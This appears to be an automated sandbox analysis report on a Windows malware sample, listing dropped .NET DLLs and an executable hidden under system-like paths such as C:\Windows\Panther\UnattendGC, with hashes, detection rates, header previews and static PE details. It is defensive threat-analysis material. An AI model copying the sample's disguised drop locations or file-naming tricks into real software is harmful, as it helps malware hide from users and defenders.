                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\ZDjBezmV.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):85504
                                                                                Entropy (8bit):5.8769270258874755
                                                                                Encrypted:false
                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                C:\Users\user\Desktop\amqbDjSR.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):85504
                                                                                Entropy (8bit):5.8769270258874755
                                                                                Encrypted:false
                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                C:\Users\user\Desktop\mUJprpRq.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):46592
                                                                                Entropy (8bit):5.870612048031897
                                                                                Encrypted:false
                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\pIbqPImn.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):64000
                                                                                Entropy (8bit):5.857602289000348
                                                                                Encrypted:false
                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\tSxpUEMf.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):23552
                                                                                Entropy (8bit):5.519109060441589
                                                                                Encrypted:false
                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\vBEPsorb.log

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):23552
                                                                                Entropy (8bit):5.519109060441589
                                                                                Encrypted:false
                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Users\user\Desktop\xIogbBMY.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):64000
                                                                                Entropy (8bit):5.857602289000348
                                                                                Encrypted:false
                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vzg................................. ........@.. ........................ ...........@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...............................O........................................0..........(.... ........8........E....9.......)...8...84...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E................j.......>.......8....~....9.... ....~....{....:....& ....8.......... ....8........~....(T...~....(X... ....<@... ....8u...~....(L... .... .... ....s....~....(P....... ....8?...r...ps....z*8.... ....~....{....:

                                                                                C:\Windows\Panther\UnattendGC\ba5d7d16636746

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (637), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):637
                                                                                Entropy (8bit):5.905047541040198
                                                                                Encrypted:false
                                                                                SSDEEP:12:LfejdH/R533t/9RS8BkPPEe74SCsXz5VCag+sJVYvRm6iG23ZNYNq:LfejNRzfBkPcIdXzdsJSvS3ZNY0
                                                                                MD5:E222350D6C9E0345924E528B5C4EFB43
                                                                                SHA1:85F34A7C49E4BFFA0698515F43025F0B270A3CA5
                                                                                SHA-256:4AA82D428718959BE9BD05CEA5E09DB3DF2E583D059C602B571BD848D92CA7C2
                                                                                SHA-512:3477098132A44633C1B5B84E0B83E2C17B66BB37DDDBE83B80EDF34B1A579142925E2E3CA7BE3F8B9E1CB2A75E08D7031168EBF23EFCC3DB29D8548A0950EC77
                                                                                Malicious:false
                                                                                Preview:RXrE66CgBqWDQA8gDClwlpjonoXtYckRo5EIRFpoKqaoPjANAUedQ4BmxDbRjSHjFFYU50O7W6l5O5ZEnKtD8GBt4cVOnYF1i1iKKqRKGhGTSGY2nXnZjEl9Dpade9T81tWWWP472i6bArbxEdlQuqSdQjGePyqGNHcjtBfYdpgBHK8WNnYBYDOKb3FxIZsD2zN2P2DC8MwEJRWGkuRmZosK3RH05sPE7cIR6GHVjWDLQKBKh9MYHGoNHC97uNHP6rHrIEJen5DDlg3sQ7T6g161y5K3HJlWOxOiCTBczrvMCklkIQrw3KtFvP2N3QXdTryySVp660HyFtyNTkv0bzcEDJxxbyjjUR3VwxSxkv0DD59Bbp3TegCeOuuJh2fHRhdx0cbfS7Qq9ZAIJwVv4PEyPYGBCJQrQsvfcLK8OXBhQWfztm9uhtMCdpicVZdJqiZQneq7mXhhNgh23RSaJfKgftCwnsmz420s6OMP6CIJMpy6HqiEHC9LX3v4b3U4urmVpz6oFCeGWATz5Fo6Jis22pUCdRxCsOZeDcRSu49Ei3yXk58WOXuM9ud9f3LxPbYIlywcyVMPinU917chTbxVdNfT9Rx1tLzGfpvvJgh2KfnVZeIhaneynCoYT

                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                \Device\Null

                                                                                Download File
                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):151
                                                                                Entropy (8bit):4.811931423009686
                                                                                Encrypted:false
                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXaTX9QuYs0vFfc2FEKvoYstNvj:Vx993DEURRBEvdFE1Ys
                                                                                MD5:4B3B1C43B680452CFB7E36A9F24E617E
                                                                                SHA1:09CD3AE7586EFCD28445A0EDA4E975525226E599
                                                                                SHA-256:6EC71241F2006CAE028F25988A5624701A2EF21D98B41530703E5F64EFF1AD19
                                                                                SHA-512:8B3DD178C49C5C2CE8428B76DDE1F56CCCEC75975F7E32FB9CD51B0C8DFAFD09060A14A737E057AE66543CEF01ECB7E7D4477B44C8378F2487445B47A9367ED8
                                                                                Malicious:false
                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/01/2025 19:27:01..19:27:01, error: 0x80072746.19:27:06, error: 0x80072746.

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.918132581533177
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:OisrvsB6Ea.exe
                                                                                File size:1'899'080 bytes
                                                                                MD5:092f45dac00ef24f3836dbfe18dfa931
                                                                                SHA1:7583f7a96b649ff903b79615ac889fdd9c1fa94d
                                                                                SHA256:6bc67978f583db1ef99eb832b456c978b8c42a5233f9ed5810fed58455e6cd6f
                                                                                SHA512:a9ab5073a183f0a8994d805ac368f160775f899a0e1e9fe9a62ee4f6fd81d28ade5af06b5677cc5e13ffd0b5a54edd2c36576d5b44d88c6ffa3fc04bb4e64b78
                                                                                SSDEEP:49152:IBJ3w9opl/yaOHkGiQzblm+WsfjEjCAX+fgnlaNkGy+Ms:yhUopl/CCQzxm+rf4um+fklaGFs
                                                                                TLSH:23952301BAC294B1D47218724A785F2069BC7D215F75CEEB73A427ADEE229C0D7353E2
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                File Icon

                                                                                Icon Hash:1515d4d4442f2d2d

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x41f530
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                call 00007FE835A06E6Bh
                                                                                jmp 00007FE835A0677Dh
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                push dword ptr [ebp+08h]
                                                                                mov esi, ecx
                                                                                call 00007FE8359F95C7h
                                                                                mov dword ptr [esi], 004356D0h
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                mov eax, ecx
                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                                mov dword ptr [ecx], 004356D0h
                                                                                ret
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                mov esi, ecx
                                                                                lea eax, dword ptr [esi+04h]
                                                                                mov dword ptr [esi], 004356B8h
                                                                                push eax
                                                                                call 00007FE835A09C0Fh
                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                pop ecx
                                                                                je 00007FE835A0690Ch
                                                                                push 0000000Ch
                                                                                push esi
                                                                                call 00007FE835A05EC9h
                                                                                pop ecx
                                                                                pop ecx
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 0Ch
                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                call 00007FE8359F9542h
                                                                                push 0043BEF0h
                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                push eax
                                                                                call 00007FE835A096C9h
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 0Ch
                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                call 00007FE835A06888h
                                                                                push 0043C0F4h
                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                push eax
                                                                                call 00007FE835A096ACh
                                                                                int3
                                                                                jmp 00007FE835A0B147h
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push 00422900h
                                                                                push dword ptr fs:[00000000h]

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                Imports

                                                                                DLLImport
